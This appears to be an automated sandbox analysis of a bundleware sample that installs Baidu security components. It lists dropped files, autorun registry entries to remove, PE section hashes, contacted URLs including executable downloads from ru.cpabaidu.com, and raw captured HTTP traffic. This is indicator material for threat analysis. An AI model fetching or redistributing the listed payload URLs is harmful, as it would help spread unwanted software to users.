%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
%WinDir%\repair (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\WIRESHARK (192 bytes)
%WinDir%\WinSxS (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
%WinDir%\$hf_mig$ (96 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
%WinDir%\Help (248 bytes)
%WinDir%\ime (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1388 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
%WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
%Program Files%\COMMON FILES (4 bytes)
%System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
%Program Files%\Adobe\Reader 9.0 (4 bytes)
%System%\wbem\Logs\wbemcore.log (576 bytes)
C:\totalcmd (4 bytes)
%System%\CatRoot2 (96 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
%WinDir%\MICROSOFT.NET (4 bytes)
%Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
%WinDir%\assembly (4 bytes)
%Documents and Settings%\Default User (56 bytes)
%System%\oobe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
%Documents and Settings%\LocalService (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Program Files%\baidu\is-39O9G.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\unins000.dat (932 bytes)
%Program Files%\baidu\is-RG24O.tmp (25913 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)
%Documents and Settings%\All Users\Desktop\百度å«士-软件管ç†.lnk (866 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士-软件管ç†.lnk (878 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\百度å«士-软件管ç†.lnk (882 bytes)
%System%\config\software (3256 bytes)
%System%\config\SOFTWARE.LOG (4483 bytes)
%System%\drivers\BDEnhanceBoost.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%System%\drivers\BDMWrench.sys (1882 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 152808 | 153088 | 4.64164 | 22ced87f8cfbeec19f10ea768b9f5033 |
.rdata | 159744 | 20275 | 20480 | 3.68225 | 9aea8072fe8459f1fb075382c5799ef0 |
.data | 180224 | 136672 | 5120 | 1.76573 | 5aafebbc10957e661762e0e7fadc057b |
.rsrc | 319488 | 352972 | 353280 | 2.60045 | ebe1342043d9699ab4effe84ccb7c5c0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ru.cpabaidu.com/baidu/test.txt | 185.8.106.167 |
hxxp://ru.cpabaidu.com/baidu/F1023_s_30803.exe | 185.8.106.167 |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://e6845.ce.akamaiedge.net/pca3.crl | |
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl | |
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl | |
hxxp://swsd.n.shifen.com/ | |
hxxp://ru.cpabaidu.com/baidu/G1023_s_70904.exe | 185.8.106.167 |
hxxp://sxsw.n.shifen.com/ | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/24946961047/dnw.xml | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/34282863525/BDMWrench.sys | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/32175066779/putips_wording.dat | |
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/33137149111/hipsClient.xml | |
hxxp://s.x.baidu.com/ | 180.76.2.46 |
hxxp://d.x.baidu.com/ | 123.125.115.130 |
hxxp://dl1sw.baidu.com/client1/common/patch/24946961047/dnw.xml | 8.37.235.11 |
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl | 23.9.117.163 |
hxxp://crl.verisign.com/pca3.crl | 23.9.117.163 |
hxxp://dl1sw.baidu.com/client1/common/patch/33137149111/hipsClient.xml | 8.37.235.11 |
hxxp://dl1sw.baidu.com/client1/common/patch/32175066779/putips_wording.dat | 8.37.235.11 |
hxxp://dl1sw.baidu.com/client1/common/patch/34282863525/BDMWrench.sys | 8.37.235.11 |
hxxp://crl.verisign.com/pca3-g5.crl | 23.9.117.163 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | 23.15.4.9 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 23.15.4.9 |
jp.download.iyuntian.com | 123.125.65.154 |
tk.download.iyuntian.com | 123.125.69.209 |
rc.download.iyuntian.com | 123.125.65.153 |
up.download.iyuntian.com | 123.125.65.148 |
res.download.iyuntian.com | 123.125.65.129 |
dtrp.download.iyuntian.com | 123.125.65.150 |
utk.download.iyuntian.com | 123.125.65.147 |
cfg.download.iyuntian.com | 123.125.65.132 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.0 200 OK
Expires: Sun, 09 Nov 2014 10:45:47 GMT
Date: Fri, 10 Oct 2014 10:45:47 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 18710
Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 2316160
Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="hipsClient.xml"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
.......k..65.Mf.?../..m.x..`.D..#........x$....x=.B...$j......y}.....R.C[4x../../1........ .q..=../7L..R..if.%.....aa.....y.c.oO...T.K.......>F..:. ..h. .>..l....vYe.X.u.C:...yQ.....6..Gr./....r. b.....W$.8.R...7....1.......$.....PYf.E..!..p...0P.-..{..|!.j....G...K...............0.........%.b.a.2*.'...~.r..!*2..I...mv..b.-..z&....v...B.q.~h.^r.....r..x.D(.3s.zI...G...........L.y.^.....|.D9[.W,....\..T.x.....[...C... ..$yKI.Q.LG..fG....".{...fP..S1...Mz).]Ln.....2v...d...seab..v.......u...`*.....#...^@..G..Sb.dL5.8nhd.l.\.y...`.w.......3.u........A....kq~.k....}-.| .......^...Z.})..Fq./.....U.)..:..8.j.q.*.e.#..-1..Je...(....{..s.`se....Q.x......n..>......o4.>.3.xRO..X.~>..C`.`.....f...o.h.),N.ad.#.-.......1.........(.S..[.....)..z....w.....G.#..(..=.]..p.E....Q....H...7........!....h?......_...1../X.....(.v......h..o..b......p.QH..-..*..M.}...c.1h..}..k.ro6\...7..4.Za.....m........>2.E...Q.....%A.b..:.....$..p.c.W....U.m...JL..f.i!.<..H.....n.)../..2.?6.B.|j.IX'.bY.?1.........}...Cc....s].h........KY.... .....2.l.#..........Vq. ........5...O;..A.Z..........7..:$..s..|...[.u...&O.kq.....U.P@.....P.......6.....MR...>0.....o#..>....c....Os.<!.a.=.O......i.n.2GR-_prM..q..@.@.........>...Bl....&.5w..P.d9..N....S...5..r....d@......(...-g,/..Z6...o}&}'.D......,...Cj..1..'...#j..[...,..*.@o.........L......w....uw/[1....~..'^....h.......O^.?...m.......\...[.?bZrl.I.X7E.......1E... .....&S.. .#.S&\g.0.49.....r.Z...~.0.K.....R,.4.d.6cG...#9.......E..._.<.@.)V0.:.........B..B.Z.-".1o.T.
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 158
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ......VH>x.yw}Y.p~t....E..;.).
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...@......H`...[....V.Y..!c...A...<.....T.....Gl~.].......W3..4A._[D....
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..j:...i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.8.@.H.P.X...` ... ..D)..-...uT.h
.).:va:Y......H...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 182
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ...0...x....U..2....$.5...'....2]..U......g'..Y..9.^. HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 182.....z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ...0...x....U..2....$.5...'....2]..U......g'..Y..9.^. ..
GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "8f6b3bcd9bb64555001fba64f5b01b92:1411517716"
Last-Modified: Wed, 24 Sep 2014 00:15:16 GMT
Date: Thu, 06 Nov 2014 06:07:34 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority..140922000000Z..141231235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2....{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N....* ....010207212031Z0!..N....-.1Gq.@...C..040401175251Z0!..Y......w`G........070411175657Z0!..Z`..H.@B....Z.*q..080403172017Z0!..l....I...Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1..7<.....e..010207211822Z0...*.H............M....s#..Lo...TU...tM.3...'.U......:Z...w.x.=....K.0;...!....D....9...,!....B.t. <..........-.....k.$<i{O.<.E...*.......Ow _..J.....
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"
Last-Modified: Tue, 23 Sep 2014 23:20:16 GMT
Date: Thu, 06 Nov 2014 06:07:34 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140922000000Z..141231235959Z0...*.H.............O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#.....Y.Ht..}.n..* ...b.Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/...}.......z.Q..qP_.-..~......!.UBW...ER..6....:.p...[...../..h...9.J(..<.;i.......?c.I.t....LV.uD....B..z...~I .6..aR[..(..q............HTTP/1.1 200 OK..Server: Apache..ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"..Last-Modified: Tue, 23 Sep 2014 23:20:16 GMT..Date: Thu, 06 Nov 2014 06:07:34 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..140922000000Z..141231235959Z0...*.H.............O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#.....Y.Ht..}.n..* ...b.Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/...}.......z.Q..qP_.-..~......!.UBW...ER..6....:.p...[...../..h...9.J(..<.;i.......?c.I.t....LV.uD....B..z...~I .6..aR[..(..q..............
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M...t..........8.@.H.P.X...` ... ..D)..-....9._e..BBw......ar.m...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 2486
...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M....t..........8.@.H.P.X...` ...0..{.....Aj...!P@4...LQ`..._..(.H.....R.........<..z<./M........~..J..I....R....h. Fk.....R...~!L:...s.>.V@ 9 ..N.0...m...xH.E.................)T5..t&FF..5....oM......}}.;.$1.n.......).^..(.E.p...........s.e...p .Kq.!..E....C.' D.3'/_...;.'o{......<.*.I....}q..@Pn..;.(m7......B..D....@....V.B>.....R6.\..(.u..`....../,7.* ...Z......q..!...*C.O........L..b"......f.2.....a.y...\..1..ecG...X..^.........2SB...6...."...NA...T.K\....v....n0.....[.(.-.w....&!x.a-../K.WC@.tG"w..J..e....P...M......4.X......n9..N]#..uL...Y..}.......y........#....cn...0..p\ .I4..v.....s......h.;..*g......."..OQpC....&....&...... X....PkzS.@.....G.J...$...sU[q.`..]..p..bkB..S..S)...... .ez.h.7.&.E......=.l/.^...>X..f..~.Y.qr........kq...y[_.Q...6.5...qcn......c.....}.NS)....2'....\#..5......6..`n..%_".......o.-1..Z.4../V.0...E<.@...].J..M1...H..*|.....CW;.9E]..|h...n...#.....E.y.,.x....Ot..*...S#..-.C..0......q4..f........W.2...<..2.#8.....*^=......c.....9,).D..?.t.bl.'.V..l..V...cg%w..e......K........P...&...n..Bn|..q..F......7t..q...lq.... ?.NmS...{.\f...X......&..4.G..2...>....ux0W....[f .N..#...k&..o.]M./.......,....a.v..I.......zG.>a|..F.M..e..1.......i.....j..............i..f.HBx...l.EL.,\.W....._...Gw.........t.*1{!........;..z......o........?G.-{.q....h...mA...'K_d.yHA .....eY....-..[.....H..5_...%.#...........&..'...z...>d.{.<}. ~..-6f%:.....90x.....U......3.O....|..[
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... ..f#.g..})..U\.........).)3.T..4.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 302
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............".k.<(h[.Vwk.R.....i..g{.! .".U-h.0....s..$..f...:.w........1JE.?.n..........N..m...q...{. ..2..FWe...........}.5.Lc...8.....3bl.]..P........Dil4.. ../..P.[....%.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 302.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ............".k.<(h[.Vwk.R.....i..g{.! .".U-h.0....s..$..f...:.w........1JE.?.n..........N..m...q...{. ..2..FWe...........}.5.Lc...8.....3bl.]..P........Dil4.. ../..P.[....%...
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...B........" b58974f666e28edaba3814768157053d(.........2.8.@.H.P.X...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.6..#.....A..G...d...*\.<..8.@.H.P.X...` ........
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=3635
Date: Thu, 06 Nov 2014 06:07:33 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=7567
Date: Thu, 06 Nov 2014 06:07:33 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.stl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.....................@.....L.........KNAy8/"...f.......k..Jm7j....R.5q....Rz..!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m..._.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|.@.M.._.....7._6...C.0...A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?...........WE.Or..O>..{.'W2.........3m.O.u..Z8....H4@.w}.o:?~....]<!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!.........`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=...f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..].|......3..y..-./....K..6{...s.<R`.}6....?.......-..@.g..S....
<<< skipped >>>
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ... ...f...f.i#O.ron...7?..";...>..;..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 286
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...... %@......).u....Z.(L]~........]......L..w... ......BTl.Tf..<...X.wg..r.i.>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;.........6..z._.0.GV..[.X..f...|.*HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 286.....z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|.8.@.H.P.X...` ...... %@......).u....Z.(L]~........]......L..w... ......BTl.Tf..<...X.wg..r.i.>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;.........6..z._.0.GV..[.X..f...|.*..
POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 182
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...0.L;P.....~.=....oX.....X5H..5.C^...v...TPJ...Jv..POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000
...z........" b58974f666e28edaba3814768157053d(.........28..@.s.(.0..=..t..............guq."..=.[Q7....W......C..F8.@.H.P.X...` ...8.L.4.CZ?.i/Q)....|.....f....K...C....l/K..?.a...JCzY.U.&.IPOST / HTTP/1.1
